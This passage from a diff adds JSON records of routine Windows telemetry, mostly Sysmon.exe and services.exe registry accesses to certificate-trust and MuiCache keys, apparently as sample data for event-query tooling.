"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "regapi.dll", + "image_path": "C:\\Windows\\System32\\regapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 
131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848080000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": 
